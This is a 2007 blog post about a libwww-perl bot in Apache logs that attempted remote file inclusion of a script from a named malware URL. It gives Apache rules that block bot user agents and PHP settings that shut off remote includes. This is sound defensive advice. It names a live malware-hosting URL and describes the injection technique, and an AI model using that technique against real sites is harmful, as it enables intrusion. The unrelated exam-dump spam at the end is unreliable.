libwww-perl/5.805 User agent (bot) visited my website Weird User-Agent - bot while going through my Apache website logs: libwww-perl/5.805
One day, while monitoring apache logs I started to see many lines looking like the one in the table below. The exact output of the logs (including user-agent and url requested and IP address are) is:
So the user from IP addresss 71.172.97.52 thought that by requesting this url from my server is going to tell it to download http://malware.t35.com/safe.txt? script and run it.
I took a look at the script that this libwww-perl bot was trying to and here it is:
Then I searched a little on Google it seems that this bot is a well-known perl library and perl module and and lwp-request which is a simple command line user agent). It could be just about anything - a homemade bot or custom browser or somebody running a script. It's a very generic tool. But by this request it's for sure somebody running a script.
It can be blocked very well with Apache mod_setenvif directive adding the following lines in your .htaccess or httpd.conf file:
SetEnvIfNoCase User-Agent libwww-perl bad_bots order deny,allow deny from env=bad_bots
or
SetEnvIfNoCase User-Agent "libwww-perl" bad_bot=1 SetEnvIfNoCase User-Agent "psycheclone" bad_bot=1 # # Allow universal access to robots.txt and custom 403 error page SetEnvIf Request_URI "robots.txt$" allow_all=1 # Order Deny,Allow Allow from env=allow_all Deny from env=bad_bot
The above lines set the environment bad_bot to 1 for every visitor/user-agent that contains libwww-perl or psycheclone and blocks them), and environment allow_all to 1 for every request of robots.txt file (and allows them) and they should e added to .htaccess file in your website's DocumentRoot, httpd.conf or bad_bots.conf (which must be included in httpd.conf with Include /path/to/bad_bots_file.conf line).
Besides this, you have to make sure that the following two variables are set to Off in /usr/local/etc/php.ini under FreeBSD) or usr/local/apache/php/php.ini (under Linux):
register_globals = Off allow_url_fopen = Off
First line disables the user of use of Register Globals: When on, register_globals will inject your scripts with all sorts of variables, like request variables from HTML forms. This coupled with the fact that PHP doesn't require variable initialization means writing insecure code is that much easier. It was a difficult decision, but the PHP community decided to disable this directive by default. When on, people use variables yet really don't know for sure where they come from and can only assume.
and second line disables opening/including files from remote URLs:
If enabled, allow_url_fopen allows PHP's file functions -- such as file_get_contents() and the include and require statements -- can retrieve data from remote locations, like an FTP or web site. Programmers frequently forget this and don't do proper input filtering when passing user-provided data to these functions, opening them up to code injection vulnerabilities. A large number of code injection vulnerabilities reported in PHP-based web applications are caused by the combination of enabling allow_url_fopen and bad input filtering.
Test king prepares students for computer certifications with modern testing facilities providing tests like 1Y0-258. Test king prepares and trains students for Microsoft certifications with tests such as 70-271 and 70-553. Test king is known for training students for Cisco certifications with tests like 642-176 and 646-171. Test king is also preparing students on the exam patterns taken from the real exams in tests such as 642-586 and 310-200.
Designed and developed by Andrei Manescu. Optimized for Mozilla Firefox.
Copyright 2007 Andrei Manescu
All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by those who posted them.